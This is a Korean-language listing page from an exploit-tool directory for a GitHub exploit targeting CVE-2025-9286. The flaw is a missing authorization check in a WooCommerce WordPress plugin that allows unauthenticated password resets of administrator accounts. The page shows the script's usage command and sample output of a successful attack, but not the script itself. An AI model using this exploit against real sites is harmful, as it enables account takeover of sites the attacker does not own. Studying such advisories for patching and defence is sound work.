Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-9286 — Appy Pie Connect for WooCommerce <= 1.1.2 - 권한 부여 누락으로 인한 비인증 권한 상승 | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-9286
Privilege EscalationPassword AttacksExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - 권한 부여 누락으로 인한 비인증 권한 상승

저장소 보기
311개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - 누락된 권한 부여로 인한 인증되지 않은 권한 상승

⚠️ Appy Pie Connect for WooCommerce <= 1.1.2 - reset_user_password를 통한 누락된 권한 부여로 인한 인증되지 않은 권한 상승

📝 설명

WordPress용 Appy Pie Connect for WooCommerce 플러그인은 1.1.2 이하의 모든 버전에서 reset_user_password() REST 핸들러 내 권한 부여 누락으로 인해 권한 상승에 취약합니다.
이로 인해 인증되지 않은 공격자가 관리자를 포함한 임의 사용자의 비밀번호를 재설정하여 관리자 접근 권한을 얻을 수 있습니다.

  • CVE: CVE-2025-9286
  • CVSS: 9.8 (Critical)

💻 익스플로잇 스크립트

다음 익스플로잇은 취약한 플러그인 버전이 실행 중인 WordPress 사이트를 대상으로 CVE-2025-9286을 악용하는 데 사용할 수 있습니다.

스크립트 이름: CVE-2025-9286.py

⚙️ 사용법

root@kitploit:~
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 실행 예시 (성공적인 악용)

root@kitploit:~
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.

📬 연락처 및 커뮤니티

  • 📨 텔레그램: @Kxploit
  • 📡 텔레그램 채널: @KNxploited

⚠️ 면책 조항

이 익스플로잇은 교육 및 승인된 침투 테스트 목적으로만 사용해야 합니다.
명시적 허가 없이 시스템을 무단으로 사용하는 것은 불법입니다.
저자는 이 도구로 인한 오용이나 피해에 대해 책임을 지지 않습니다.


제작: Khaled Alenazi (Nxploited)

도구 다운로드